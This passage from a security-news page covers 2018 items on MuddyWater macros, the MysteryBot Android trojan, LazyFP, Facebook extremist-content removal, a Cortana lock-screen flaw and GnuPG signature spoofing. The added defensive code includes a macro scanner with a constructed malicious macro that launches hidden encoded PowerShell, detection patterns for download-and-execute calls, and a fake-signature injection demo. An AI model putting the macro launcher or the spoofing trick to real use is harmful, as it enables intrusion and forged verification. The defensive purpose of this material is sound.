The bait document used in the campaign claims to be a reward or a promotion, a change that suggests the hackers are now targeting entities in other industries.

Once the victim opens the document, they are enticed into enabling the macro to view its full content.

“Once the macro is enabled, it will use the Document_Open() event to automatically execute the malicious routine if either a new document using the same template is opened or when the template itself is opened as a document.” continues the analysis.

The code executes two PowerShell scripts, the second of which is used by the attackers to drop various components on the compromised machine.

The final payload delivered in this campaign is the PRB-Backdoor RAT, which is controlled by a command and control (C&C) server at outl00k[.]net.

The backdoor can execute a broad range of commands, including gather browsing history from installed browsers, exfiltrate passwords found in the browser, read and write files, execute shell commands, log keystrokes and capture screenshots.

“If these samples are indeed related to MuddyWater, this means that the threat actors behind MuddyWater are continuously evolving their tools and techniques to make them more effective and persistent,” Trend Micro concludes.
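The two indicators both MuddyWater write-ups on this page stress, a Document_Open() auto-execution trigger and scripts carried inside the document rather than downloaded, are straightforward to triage once the VBA source has been extracted. The following is an added example and is not Trend Micro code; it assumes the macro text has already been pulled out of the document (for instance with olevba), and the trigger list, the suspicious-call patterns and the two VBA samples, including the base64-encoded PowerShell stage, are constructed for illustration.

```python
import base64
import binascii
import re
from typing import Dict, Optional

# Events Word/Excel run automatically when a document is opened or closed.
AUTOEXEC = re.compile(
    r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|Document_Close|AutoClose|AutoExec)\b",
    re.IGNORECASE,
)
# Calls and flags that commonly appear when a macro launches PowerShell or
# decodes an embedded stage.  Constructed list, not Trend Micro's signatures.
SUSPECT = re.compile(
    r"(WScript\.Shell|CreateObject\s*\(|\bShell\s*\(|\bpowershell\b|\bcmd(?:\.exe)?\b"
    r"|-EncodedCommand|-enc\b|\bIEX\b|Invoke-Expression|DownloadString"
    r"|\bChrW?\s*\(|\bStrReverse\b)",
    re.IGNORECASE,
)
# Long base64-looking runs: the macros discussed above carry their scripts
# inline instead of downloading them.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blob(token: str) -> Optional[str]:
    """Decode base64 as UTF-16LE (what PowerShell -EncodedCommand expects) or
    UTF-8; return None when the result is not mostly printable text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    odd = raw[1::2]                       # high bytes of UTF-16LE ASCII are zero
    utf16 = len(odd) > 0 and odd.count(0) > len(odd) // 2
    text = raw.decode("utf-16le" if utf16 else "utf-8", errors="replace")
    printable = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    return text if printable >= 0.9 * len(text) else None


def scan_macro(vba: str) -> Dict[str, object]:
    """Flag auto-exec triggers, launcher calls and inline encoded stages."""
    triggers = sorted({m.group(1) for m in AUTOEXEC.finditer(vba)})
    calls = {m.group(1).lower() for m in SUSPECT.finditer(vba)}
    decoded = [d for d in (decode_blob(t) for t in B64_RUN.findall(vba)) if d]
    # A decoded stage can itself carry the flags we look for (IEX, DownloadString...).
    inner = {m.group(1).lower() for d in decoded for m in SUSPECT.finditer(d)}
    return {
        "triggers": triggers,
        "calls": sorted(calls | inner),
        "decoded": decoded,
        "suspicious": bool(triggers) and bool(calls or decoded),
    }


# --- constructed samples -------------------------------------------------
_PAYLOAD = "IEX ([System.IO.File]::ReadAllText($env:TEMP + '\\stage2.ps1'))"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_VBA = f'''Private Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -nop -w hidden -enc {_ENC}"
    CreateObject("WScript.Shell").Run cmd, 0
End Sub
'''
BENIGN_VBA = '''Sub FormatTable()
    Selection.Tables(1).AutoFormat
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = scan_macro(src)
        print(label, "suspicious" if r["suspicious"] else "clean", r["triggers"], r["calls"])
        for stage in r["decoded"]:
            print("  decoded stage:", stage)
```

Heavily obfuscated macros (Chr() concatenation, StrReverse, split strings) will hide the launcher call from the regex but not the trigger, which is why the verdict requires a trigger plus either a call or a decodable blob rather than any single hit; run the decoded stage back through the same scanner, as above, so a second-stage downloader is not missed.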


Mysterybot, a new LokiBot-Linked Android Trojan Emerges
16.6.2018 securityaffairs Android

Threat Fabric reports a newly discovered banking Trojan, dubbed Mysterybot, targeting Android 7 and 8; the malware appears to be linked to Lokibot.
Threat Fabric (formerly known as SfyLabs) reports a newly discovered banking Trojan targeting Android 7 and 8. It appears to be linked to Lokibot, the hydra of the Android malware zoo, because it uses the same command and control (C&C) server.


The recently discovered banking Trojan, dubbed Mysterybot, seems to be either an update of Lokibot or a member of the same Trojan family.

Lokibot is known as the hydra of the Android malware zoo, because it has Android Trojan and ransomware capabilities. Killing one does not kill the other.

Mysterybot features improved commands compared to Lokibot, a new name, and modified network communication.

“Although certain Android banking malware families such as but not limited to ExoBot 2.5, Anubis II, DiseaseBot have been exploring new techniques to perform overlay attacks on Android 7 and 8, it seems that the actor(s) behind Mysterybot have successfully implemented a workaround solution and have spent some time on innovation,” reads the Threat Fabric analysis.

Here is a list of the ‘innovative’ features the researchers discovered:

The supported commands include: call a given phone number, fetch contact list information, forward calls, copy all SMS messages, log keystrokes, encrypt files on external storage and delete all contacts, send an SMS message to all contacts, change the default SMS app, call a USSD number, delete all SMS messages and send SMS messages.
Phishing functionality using a new technique to overlay phishing pages on top of legitimate apps on Android 7 and 8 devices. Restrictions in Security-Enhanced Linux (SELinux) and other security controls in newer Android versions were built to prevent malware from displaying fake windows over legitimate apps. The new technique leverages the Android PACKAGE_USAGE_STATS permission (Usage Access permission) to bypass these restrictions, and abuses the AccessibilityService to obtain that permission.
The Mysterybot infection works like this: the malware, posing as an Adobe Flash Player app, asks the victim to grant it the Usage Access permission, which enables its malicious capabilities. The malware then monitors the package names of the applications in the foreground. It targets over 100 applications with overlays, including mobile banking and social platform apps.
In addition, Mysterybot uses a new method of logging keystrokes: it calculates the location of the keys on the screen and places a different View over each of them, allowing it to register which keys have been pressed. This feature still seems to be under development, because Mysterybot cannot yet send the logged keystrokes to the C&C server.
Like Lokibot, Mysterybot also has ransomware capabilities, managed from a dashboard separate from the Trojan’s. It encrypts each file in the external storage directory and then deletes the originals. Mysterybot places each file in a password-protected ZIP archive, but uses the same runtime-generated password for all archives. Once encryption is complete, the malware displays a dialog claiming the victim watched pornographic material and instructing them to contact the attacker via email.
The passwords Mysterybot uses for the ZIP archives are 8 characters long: Latin letters (upper and lowercase) combined with digits.
Victim IDs can collide, because the ID assigned to each victim is only a number between 0 and 9,999.
Mysterybot seems to be the next step in the evolution of Android banking malware, inheriting from the hydra Lokibot, and at the same time improving it by being a banking Trojan, ransomware, and keylogger in one malware agent.

About the author

Cordny Nederkoorn

Software test engineer, Founder TestingSaaS, a social network about researching cloud applications with a focus on forensics, software testing and security.


A new Meltdown-like flaw tracked as LazyFP affects Intel CPUs
16.6.2018 securityaffairs Vulnerebility

A new vulnerability involving side channel speculative execution on Intel chips, known as LazyFP, has been announced and assigned CVE-2018-3665.
A new vulnerability tracked as LazyFP (CVE-2018-3665), a speculative execution side channel, affects Intel CPUs; like previous ones, it could be exploited by attackers to access sensitive information on the affected system.

The vulnerability was discovered by Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG.

The vulnerability involves the way the operating system handles the floating point unit (FPU) state when switching between processes: it saves the current context (the state of the current process, including its registers) and restores the context of the new process.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” reads the advisory published by Intel.

There are two ways to handle this switch, lazy FPU restore and eager FPU restore; the former performs better on older systems.

Security researchers recently discovered that the lazy method is vulnerable to attacks that could expose FPU state data, which can contain sensitive information such as cryptographic keys.

“The register state of the floating point unit (FPU), which consists of the AVX, MMX and SSE register sets, can be leaked across protection domain boundaries. This includes leaking across process- and virtual machine boundaries.” reads the analysis published by Thomas Prescher, Julian Stecklina, Jacek Galowicz

“The FPU state may contain sensitive information such as cryptographic keys.”

According to the experts, the CVE-2018-3665 vulnerability is similar to Meltdown Variant 3a.

Intel confirmed that CVE-2018-3665 affects Core processors, but said that the issue has been addressed by operating system and hypervisor software developers for many years; Intel urges vendors that still haven’t fixed the issue to do so as soon as possible by releasing the necessary security updates.

LazyFP doesn’t affect systems using AMD or ARM processors.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

“Is Lazy restore enabled by default and can it be disabled?

Lazy restore is enabled by default in Windows and cannot be disabled.” reads the FAQs published by Microsoft.

Recent versions of the Linux kernel use eager FPU switching and are therefore not affected; on older kernels the flaw can be mitigated by forcing eager FPU switching, rebooting the kernel with the “eagerfpu=on” boot option.
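Whether a given Linux host falls under "recent kernel, not affected" or "older kernel, needs eagerfpu=on" is a two-line check, but it is worth scripting across a fleet. The following is an added example, not code from the researchers or any vendor; it assumes that mainline Linux made eager FPU switching unconditional in 4.9 (so that is the threshold used), and that the vendor string in /proc/cpuinfo is enough to rule out non-Intel CPUs. Distributions backport fixes into older version numbers, so a "check" verdict means verify the vendor's advisory, not "vulnerable".

```python
import os
import re
from typing import Tuple

# Assumption: mainline Linux dropped lazy FPU switching in 4.9, so kernels
# from that release on always restore FPU state eagerly.  Distribution
# kernels may carry the same fix under an older version number.
EAGER_ONLY_SINCE = (4, 9, 0)


def parse_release(release: str) -> Tuple[int, int, int]:
    """'4.4.0-128-generic' -> (4, 4, 0); '4.17' -> (4, 17, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def lazyfp_status(release: str, cmdline: str, vendor: str = "GenuineIntel") -> Tuple[str, str]:
    """Return (status, reason); status is 'not-affected', 'mitigated' or 'check'."""
    if vendor == "AuthenticAMD":
        return "not-affected", "AMD processor: LazyFP is reported for Intel CPUs only"
    if vendor != "GenuineIntel":
        return "check", f"CPU vendor {vendor!r} not recognised; confirm manually"
    if parse_release(release) >= EAGER_ONLY_SINCE:
        return "mitigated", f"kernel {release} uses eager FPU switching (assumed for >= 4.9)"
    if re.search(r"(^|\s)eagerfpu=on(\s|$)", cmdline):
        return "mitigated", "eagerfpu=on present on the kernel command line"
    return "check", ("older kernel without eagerfpu=on: confirm a vendor backport "
                     "or reboot with eagerfpu=on")


def local_status() -> Tuple[str, str]:
    """Evaluate the running system; off Linux the files are missing and we
    fall through to a 'check' verdict rather than guessing."""
    try:
        release = os.uname().release
        with open("/proc/cmdline") as f:
            cmdline = f.read()
        vendor = "unknown"
        with open("/proc/cpuinfo") as f:
            for line in f:
                if line.startswith("vendor_id"):
                    vendor = line.split(":", 1)[1].strip()
                    break
    except (AttributeError, OSError) as exc:
        return "check", f"could not read system information: {exc}"
    return lazyfp_status(release, cmdline, vendor)


if __name__ == "__main__":
    status, reason = local_status()
    print(f"{status}: {reason}")
```

Hypervisors are the other half of the picture: a guest kernel's verdict says nothing about whether the host saves and restores FPU state eagerly between VMs, which is the boundary the researchers say can also leak, so the same question has to be put to the hypervisor vendor separately.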

AWS told its customers that its infrastructure is not affected.


Facebook Claims 99% of Extremist Content Removed Without Users' Help
15.6.2018 securityweek Social

Facebook claims growing success in fight against extremist content

At this week's International Homeland Security Forum (IHSF) hosted in Jerusalem by Israel’s minister of public security, Gilad Erdan, Facebook claimed growing success in its battle to remove extremist content from the network.

Dr. Erin Marie Saltman, Facebook counterterrorism policy lead for EMEA, said, "On Terrorism content, 99% of terrorist content from ISIS and al-Qaida we take down ourselves, without a single user flagging it to us. In the first quarter of 2018 we took down 1.9 million pieces of this type of terrorist content."

This was achieved by a combination of Facebook staff and machine learning algorithms. "Focusing our machine learning tools on the most egregious terrorist content we are able to speak to scale and speed of efforts much more openly. But human review and operations is also always needed."

However, the implication that Facebook is winning the war against extremism is countered by a report ('Spiders of the Caliphate: Mapping the Islamic State's Global Support Network on Facebook' PDF) published in May 2018 by the Counter Extremism Project (CEP).

CEP was launched in 2014 by former U.S. government officials, including former Homeland Security adviser Frances Townsend, former Connecticut Senator Joseph Lieberman, and Mark Wallace, a former U.S. Ambassador to the United Nations.

Its report mapped 1,000 Facebook profiles explicitly supporting IS between October 2017 and March 2018. Using the open source network analysis and visualization program, Gephi, it found that visible 'friends' expanded the 1,000 nodes with 5,347 edges. Facebook's friending mechanism is particularly criticized as a means by which IS accounts find new targets to recruit.

The report actually refers to the 99% claim, implying that Saltman's claim is not a new development superseding the findings of CEP: "Given IS's ongoing presence on the platform, it is clear that Facebook's current content moderation systems are inadequate, contrary to the company's public statements. Facebook has said that they remove 99% of IS and Al Qaeda content using automated systems..."

In fact, CEP fears that Facebook relies too heavily on its algorithms for finding and removing terrorist content. "This reliance on automated systems means IS supporters' profiles often go unremoved by Facebook and can remain on the platform for extended periods of time." It gives the example of a video from the IS Amaq news agency that was posted in September 2016 and remained available when the report was written in April 2018.

"The video depicts combat footage from the Battle of Mosul and shows how IS produced a variety of weapon systems including car bombs and rocket launchers," notes the report.

Another example describes an ISIS supporter friending a non-Muslim and then gradually radicalizing him during the six-month period. "ID 551 played a clear role in radicalizing ID 548 and recruiting him as an IS supporter," says the report. "Facebook was the platform that facilitated the process, and it also functioned as an IS news source for him. Furthermore, given his connections with existing IS networks on Facebook, the moment that ID 548 wishes to become more than an online supporter he has the necessary contacts available to him. These are individuals who can assist with traveling to fight for the group or staging an attack in America. This case provides a detailed insight into the scope to which IS has taken advantage of Facebook's half-measures to combating extremism online."

This is not a simple problem. Taking down suspect terrorist content that is posted and used legitimately is a direct infringement of U.S. users' First Amendment rights. Dr Saltman described this issue at the IHSF conference. "We see," she said, "that pieces of terrorist content and imagery are used by legitimate voices as well; activists and civil society voices who share the content to condemn it, mainstream media using imagery to discuss it within news segments; so, we need specialized operations teams with local language knowledge to understand the nuance of how some of this content is shared."

To help avoid freedom of speech issues, Facebook has made its enforcement process more transparent. "I am pleased to say," said Saltman, "that just last month we made the choice to proactively be more transparent about our policies, releasing much more information about how we define our global policies through our Comprehensive Community Standards. These standards cover everything from keeping safe online to how we define dangerous organizations and terrorism."

At the same time, appealing removal decisions is made easier and adjudicated by a human. This can be problematic. According to a January 2018 report in the Telegraph, an IS supporter in the UK who shared large amounts of IS propaganda had his account reactivated nine times by Facebook after he complained to the moderators that Facebook was stifling his free speech.

Where clearly illegal material is visible, Facebook cooperates proactively with law enforcement. Waheba Issa Dais, a 45-year-old Wisconsin mother of two, is in federal custody after being charged on Wednesday this week with providing 'material support or resources to a foreign terrorist organization.'

The Milwaukee Journal Sentinel reports, "The investigation appears to have started in January after Facebook security told the FBI that there was a 'Wisconsin-based user posting detailed instructions on how to make explosive vest bombs in support of ISIS,' the affidavit states. The person behind the Facebook posts, who the FBI said they determined was Dais, 'also appeared to be engaged in detailed question and answer sessions discussing substances used to make bombs'."

Ricin is mentioned. It would be easy enough for a word like 'ricin' to activate an alert. It is in the less obvious extremist content that machine learning algorithms need to be used. But machine learning is still a technology with great promise and partial delivery. "The real message is that Facebook has made it more difficult for ISIS and Al-Qaida to use their platform for recruiting," Ron Gula, president and co-founder of Gula Tech Adventures told SecurityWeek.

"Machine learning is great at recognizing patterns. Unfortunately, if the terrorists change their content and recruiting methods, they may still be able to leverage Facebook. This type of detection could turn into a cat and mouse game where terror organizations continuously change their tactics, causing Facebook to constantly have to update their rules and intelligence about what should be filtered."

The extremists won't make it easy. "They have become very good at putting a reasonable 'face' on much of their online recruiting material," explains John Dickson, Principal at the Denim Group. "Once they have someone interested is when they fully expose their intent. Given this situation, I’m not sure how [the algorithms] don’t create a ton of false positives and start taking down legitimate Islamic content."

Nearly every security activity creates false positives. "I suspect this will be no different," he continued. "Machine learning or more specifically supervised learning likely will help aid security analysts attempting to distinguish between legitimate jihadist recruiting material and generic Islamic content. But it will still need a human to make the final decisions – and that human is likely to be biased by the American attitude towards freedom of speech."

In the final analysis, Facebook is caught between competing demands: a very successful business model built on making 'friending' and posting easy; the First Amendment protecting free speech; and moral and legal demands to find and exclude disguised extremist needles hidden in a very large haystack of 2.2 billion monthly active Facebook users.


New LokiBot-Linked Android Trojan Emerges
15.6.2018 securityweek Android

A newly discovered banking Trojan targeting Android 7 and 8 versions is using the same command and control (C&C) server as LokiBot, Threat Fabric (formerly known as SfyLabs) reports.

Dubbed MysteryBot, the new threat appears to be either an update for LokiBot or a brand new malware family from the same threat actor. It features improved commands compared to LokiBot, a new name, and modified network communication.

Although featuring generic Android banking Trojan functionalities, the new malware stands out in the crowd, courtesy of novel overlay, keylogging, and ransomware capabilities, researchers discovered.

The list of supported commands includes: call a given phone number, fetch contact list information, forward calls, copy all SMS messages, log keystrokes, encrypt files on external storage and delete all contacts, send an SMS message to all contacts, change default SMS app, call a USSD number, delete all SMS messages, and send SMS messages.

In addition to these capabilities, the Trojan can overlay phishing pages on top of legitimate applications, and uses a novel technique for that, to ensure success on Android 7 and 8 devices as well.

Restrictions in Security-Enhanced Linux (SELinux) and other security controls in new Android versions were meant to prevent malware from displaying fake windows over legitimate apps. The new technique leverages the Android PACKAGE_USAGE_STATS permission (Usage Access permission) to bypass the restrictions, and also abuses the AccessibilityService to get the permission.

Posing as an Adobe Flash Player app, the malware asks the victim to grant it the Usage Access permission, which enables its nefarious capabilities. The malware then attempts to monitor package names of the applications in the foreground. It targets over 100 applications with the overlays, including mobile banking and social platform apps.

MysteryBot also uses a new method of logging keystrokes: it calculates the location of the keys on the screen (it considers that each key has a set location on the screen), and places a different View over each of them (width and height of 0 pixels), which allows it to register which keys have been pressed.

The code, however, appears to be under development, as the malware doesn’t yet include the capability to send the logged keystrokes to the C&C server.

The malware also includes locker/ransomware capabilities, which are managed from a dashboard separate from the Trojan's, the researchers reveal. MysteryBot can encrypt each file in the External Storage directory individually, and then delete the original files.

The malware places each file in a password-protected ZIP archive, but uses the same password for all archives (the key is generated during runtime). When completing the encryption, the malware displays a dialogue claiming the victim watched pornographic material and instructing them to contact the attacker via email.

The security researchers discovered that the passwords the malware uses are only 8 characters long, and that only characters of the Latin alphabet (upper and lower case) combined with numbers are used. Moreover, the IDs assigned to each victim can only be a number between 0 and 9,999, meaning that the same ID could actually be assigned to multiple victims.

“Although certain Android banking malware families such as but not limited to ExoBot 2.5, Anubis II, DiseaseBot have been exploring new techniques to perform overlay attacks on Android 7 and 8, it seems that the actor(s) behind MysteryBot have successfully implemented a workaround solution and have spent some time on innovation,” Threat Fabric concludes.


Meltdown-Like 'LazyFP' Vulnerability Impacts Intel CPUs
15.6.2018 securityweek
Vulnerebility

Intel and software vendors have started informing users about a new vulnerability involving side channel speculative execution that could be exploited by malicious actors to obtain sensitive information from the targeted system.

Dubbed LazyFP, the security hole is related to the floating point unit (FPU), also known as the math coprocessor. When switching between processes, the operating system saves the FPU state of the current process and restores the FPU state of the new process.

There are two types of switching, Lazy FPU and Eager FPU switching. Lazy FPU switching provides some benefits for performance, but on modern systems the gain has become negligible, which has led to an increasing use of Eager switching.

Researchers discovered recently that if the Lazy method is used, it may be possible for an attacker to access FPU state data, which can contain sensitive information, such as cryptographic keys.

“System software may opt to utilize Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value,” Intel said in an advisory.

The vulnerability, tracked as CVE-2018-3665, is similar to Meltdown, specifically Variant 3a, but the issue has been assigned only a “medium” severity rating.

Julian Stecklina from Amazon Germany, Thomas Prescher from Cyberus Technology and Zdenek Sojka from SYSGO AG have been credited for finding the vulnerability. Colin Percival has also been credited, but the researcher says he only wrote an exploit for the flaw.

Cyberus has published a blog post for the LazyFP vulnerability, but it has withheld some details at Intel’s request.

Each advisory, blog post and discussion focusing on LazyFP provides some clues as to which systems may be affected.

Intel says the vulnerability affects its Core processors, which are marketed as Xeon for servers. The company claims the issue has been addressed by operating system and hypervisor software developers for many years, and vendors that are still impacted should release updates in the coming weeks.

Systems using AMD or ARM processors do not appear to be impacted. “Based on our analysis to-date, we do not believe our products are susceptible to the recent security vulnerability identified around lazy FPU switching,” AMD told SecurityWeek.

Microsoft has yet to say exactly which versions of Windows are vulnerable, but the company noted that “Lazy restore” is enabled by default in all versions of the operating system and cannot be disabled. The tech giant assured customers that VMs running in Azure are not at risk.

AWS told customers that its infrastructure is not affected, but advised them to ensure their operating systems are always up to date. The Xen Project says systems running any version of Xen are vulnerable.

In the case of Linux, recent versions of the kernel use Eager FPU. On systems using older processors, the vulnerability can be mitigated by booting the kernel with the “eagerfpu=on” parameter to enable Eager FPU. Red Hat, DragonflyBSD and OpenBSD have published advisories.


Cortana Flaw Allows for Code Execution from Lock Screen
15.6.2018 securityweek
Vulnerebility

One of the vulnerabilities Microsoft addressed with the June 2018 security patches was a flaw in Cortana that could allow an attacker to elevate privileges and execute code from the lock screen.

The issue, discovered by Cedric Cochin, Cyber Security Architect and Senior Principal Engineer at McAfee, is tracked as CVE-2018-8140. The bug can be abused to execute code on the impacted machine, directly from the lock screen.

In an advisory, Microsoft explains that the vulnerability “exists when Cortana retrieves data from user input services without consideration for status.” The company confirms the possible exploitation to execute commands with elevated permissions.

The vulnerability requires physical access to the impacted device and appears connected to a flaw independent researchers Amichai Shulman and Tal Be'ery detailed in March, and which could be abused to install malware on the affected computers.

In order to exploit the issue, an attacker with access to the impacted computer needs to have Cortana assistance enabled. A user can interact with the voice-based assistant even from the lock screen, by saying “Hey Cortana.”

Cortana can also be tricked to display search results with the contextual search menu, from the lock screen. This, however, requires the use of a keyboard-timing sequence: “any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed.”

According to Cochin, because Windows indexes file content, including strings in documents, Cortana can be abused to leak sensitive information. Specifically, if the right search phrase is used when clicking on the “tap and say” button, Cortana could show the content of confidential files, such as those storing passwords.

“Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device,” the researcher notes.


When hovering over a file in the search results provided by Cortana, the full path or content of the file would be displayed. When clicking on the file, it is launched using the appropriate program, but would only be accessible after the user logs in.

“At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad),” Cochin says.

Basically, “live off the land” attacks that abuse existing tools for malicious purposes cannot be performed because of a lack of parameters. Other nefarious operations, however, such as uninstalling applications, are possible even with these restrictions in place.

To execute code from the lock screen using Cortana, one would need to make sure the code is indexed (appears in the contextual menu). To get results to show up in the index of an authenticated user, an attacker can abuse OneDrive, where the contents of all shared folders with “edit” rights are indexed.

Thus, an attacker can drop an executable in the OneDrive folder, which can then even be executed as an administrator by simply right-clicking on it and selecting the “Run as administrator” option. Although a user account control (UAC) prompt could be triggered, the attack might still work, as users rarely check the content of the prompt before clicking through it.

Another option the attacker has is to use a non-portable executable (PE) malicious program, such as a PowerShell script. However, Cortana would only allow for the editing of such files, and would open them in Notepad instead of the default editor (PowerShell ISE).

When searching for txt, however, Cortana would display not only the text files, but also recently opened ones, such as the PowerShell script, and would provide a different contextual menu for them. Thus, an attacker could first edit the script, then search for txt, and simply select “Run with PowerShell” from the right-click menu.

“We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device. This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen,” the security researcher explains.

Although code execution is now possible, there are limitations, as no command-line parameters can be passed. However, because it is possible to use the keyboard in addition to voice commands when interacting with Cortana from the lock screen, an attacker could use this to run the PowerShell code as an administrator.

“What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique,” the researcher notes.

To prevent exploitation of the vulnerability, even if it can only be abused with physical access to the vulnerable machine, one could turn off Cortana on the lock screen. Installing the recently released fixes for CVE-2018-8140 also mitigates the attack.


GnuPG Vulnerability Allows Spoofing of Message Signatures
15.6.2018 securityweek
Vulnerebility

GnuPG recently addressed an input sanitization vulnerability where a remote attacker could spoof arbitrary signatures.

Part of the GNU Project and also known as GPG, GnuPG is a complete and free implementation of the OpenPGP standard that enables the encryption and signing of data and communications. The hybrid-encryption software program has a versatile key management system and access modules for all kinds of public key directories.

Released earlier this month, GnuPG version 2.2.8 addresses CVE-2018-12020, a vulnerability affecting GnuPG, Enigmail, GPGTools and python-gnupg, Marcus Brinkmann, who discovered the bug, reveals. Brinkmann has dubbed the flaw SigSpoof.

“The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which allows remote attackers to spoof arbitrary signatures via the embedded ‘filename’ parameter in OpenPGP literal data packets, if the user has the verbose option set in their gpg.conf file,” he notes.

Status messages, GnuPG maintainer Werner Koch explains, are parsed by programs to get information from GPG about the validity of a signature. Status messages are created with the option “--status-fd N,” where N is a file descriptor. If N is 2, status messages and regular diagnostic messages share the stderr output channel.

The issue stems from the OpenPGP format allowing the file name of the original input file to be included in a signed or encrypted message. The GnuPG tool can display a notice with that file name during decryption and verification, but it did not sanitize the file name, meaning that an attacker could include line feeds or other control characters in it.

Because of that, terminal control sequences could be injected, and the so-called status messages could be faked. Furthermore, the verification status of a signed email could also be faked.

“The attacker can inject arbitrary (fake) GnuPG status messages into the application parser to spoof signature verification and message decryption results. The attacker can control the key IDs, algorithm specifiers, creation times and user ids, and does not need any of the private or public keys involved,” Brinkmann explains.

He also notes that the injected status messages must fit within 255 characters, the length limit of the “name of the encrypted file” field in OpenPGP.

Brinkmann also published a proof of concept to show how signatures can be spoofed in Enigmail and GPGTools, and another to show how both the signature and encryption can be spoofed in Enigmail. Signature spoofing is also possible on the command line, he demonstrated.

While disabled by default, verbose is included in several recommended configurations for GnuPG, and it is one of the main causes for this vulnerability.

According to the researcher, users should make sure they don’t have verbose in gpg.conf and should avoid using gpg --verbose on the command line. Developers are advised to add --no-verbose to all invocations of gpg.

“The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure. GnuPG is not only used for email security, but also to secure backups, software updates in distributions, and source code in version control systems like Git,” Brinkmann claims.
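To make the status-channel confusion described above concrete, here is an added Python example (not code from the article, GnuPG or python-gnupg) that models a verifier parsing constructed gpg output under `--status-fd 2` versus a dedicated status fd, plus the gpg.conf check implied by the advice to keep verbose out of the configuration; the output text, key IDs and function names are constructed for illustration.

```python
"""Added example: why parsing GnuPG status lines from a shared stderr is
unsafe, and the two application-side checks (no verbose, dedicated status fd).
All sample output below is constructed; the key IDs are placeholders."""

STATUS_PREFIX = "[GNUPG:] "


def parse_status(status_text):
    """Split the text of a GnuPG status channel into (keyword, args) pairs.
    Only lines that begin with the status prefix are taken into account."""
    entries = []
    for line in status_text.splitlines():
        if line.startswith(STATUS_PREFIX):
            fields = line[len(STATUS_PREFIX):].split(None, 1)
            entries.append((fields[0], fields[1] if len(fields) > 1 else ""))
    return entries


def signature_verdict(status_text):
    """Reduce status keywords to a verdict the way a wrapper library does."""
    keywords = {kw for kw, _ in parse_status(status_text)}
    if "GOODSIG" in keywords and "VALIDSIG" in keywords:
        return "good"
    if "BADSIG" in keywords or "ERRSIG" in keywords:
        return "bad"
    return "unsigned"


# Constructed diagnostic output (stderr) of a *verbose* gpg run decrypting an
# UNSIGNED message whose literal-data packet filename carries an embedded
# newline followed by text in status-line format (the condition the article
# describes). Nothing here came from gpg's status machinery.
DIAGNOSTICS = (
    "gpg: encrypted with 2048-bit RSA key, ID 0000000000000000, created 2018-06-15\n"
    "gpg: original file name='report.txt\n"
    "[GNUPG:] GOODSIG 0000000000000000 Placeholder <placeholder@example.invalid>\n"
    "[GNUPG:] VALIDSIG 0000000000000000000000000000000000000000 2018-06-15\n"
    "'\n"
)

# Constructed real status channel for the same run: decryption succeeded and
# no signature was present, so no GOODSIG/VALIDSIG lines exist.
REAL_STATUS = (
    "[GNUPG:] ENC_TO 0000000000000000 1 0\n"
    "[GNUPG:] BEGIN_DECRYPTION\n"
    "[GNUPG:] DECRYPTION_OKAY\n"
    "[GNUPG:] END_DECRYPTION\n"
)


def verdict_shared_stderr(diagnostics, real_status):
    """With --status-fd 2, status lines and diagnostics interleave on stderr,
    so the parser sees the filename notice as if it were status output."""
    return signature_verdict(diagnostics + real_status)


def verdict_dedicated_fd(diagnostics, real_status):
    """With --status-fd N (N != 2), only the dedicated channel is parsed;
    the diagnostics never reach the status parser."""
    return signature_verdict(real_status)


def gpgconf_enables_verbose(conf_text):
    """True if a gpg.conf turns on verbose output (the SigSpoof precondition).
    gpg.conf holds one long option per line without the leading dashes; lines
    whose first non-blank character is '#' are comments; a later 'no-verbose'
    resets the level."""
    verbose = False
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        option = line.split()[0]
        if option == "verbose":
            verbose = True
        elif option == "no-verbose":
            verbose = False
    return verbose


def hardened_gpg_args(message_path, status_fd=3):
    """Argument list a wrapper should use (all documented GnuPG long options):
    --no-verbose overrides any verbose in gpg.conf, --status-fd 3 keeps status
    lines off stderr. The caller must open fd 3 as a pipe (e.g. pass_fds)."""
    return ["gpg", "--batch", "--no-verbose", "--status-fd", str(status_fd),
            "--decrypt", message_path]


if __name__ == "__main__":
    print("shared stderr verdict:", verdict_shared_stderr(DIAGNOSTICS, REAL_STATUS))
    print("dedicated fd verdict: ", verdict_dedicated_fd(DIAGNOSTICS, REAL_STATUS))
    print("verbose in gpg.conf:  ", gpgconf_enables_verbose("# comment\nverbose\n"))
```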


Siemens Patches Vulnerabilities in SCALANCE, Other Devices
15.6.2018 securityweek ICS

